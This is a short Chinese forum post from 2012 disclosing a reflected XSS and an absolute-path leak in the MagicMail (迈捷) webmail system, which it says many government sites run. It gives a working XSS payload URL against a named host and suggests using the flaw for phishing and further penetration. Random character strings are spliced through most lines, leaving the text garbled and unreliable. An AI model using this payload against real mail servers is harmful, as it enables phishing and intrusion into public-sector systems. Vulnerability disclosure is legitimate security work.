今天上午在黑盒测试本地的教育网的时候发现的一个邮件系统漏洞
. I. C b2 ?2 {* d$ a2 l, k, c' }' H; x7 F
! l; S, H5 M$ @, S包含 一个反射性XSS 以及 绝对路径泄漏
$ I3 T" {0 {& ]/ H看了看 貌似全部是linux的。& S9 W+ _% T9 O4 M2 ]4 {
5 b U! Q- K' c4 J( d) t4 T: D关键字:迈捷邮件系统 by MagicMail
+ l1 \ x, H$ s3 S2 h
( D! y" t7 F: h3 m8 ]可以看到很多政府网站都用这个邮件系统
+ T+ {5 x- R0 G f9 ? S4 W
U4 m. y. I6 c4 o7 V/ q绝对路径 http://madman.in/index.php?login_type=declare&language=
" V" O# P2 O2 y# Y" ^% m: P0 N3 p+ b$ ~ ~1 G. q4 _
5 m$ V; n( k) \: |& s* O* j" }9 O9 S) d' }) l$ m4 s5 v# {
XSS:http://madman.in/index.php?login_type=declare&language=–%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,while%28true%29{alert%281%29}%3E%3C/script%3E: H4 Y( Q' x; ], @
" C) _( u! l( \1 l& w1 P5 I9 J% b+ A1 Q4 q
5 n6 y* l9 e3 q; S( J
虽然危害不是很大,不过利用起来还是可以的 比如 钓鱼 比如进一步的渗透 等等$ ~+ P, I* Y7 m. M7 I$ i8 q
$ R% @5 W0 o3 [
修复方案:看官方补丁吧。- s* F5 E6 w) U. N% t
|
发表于 2012-11-9 20:38:41
收藏
支持
反对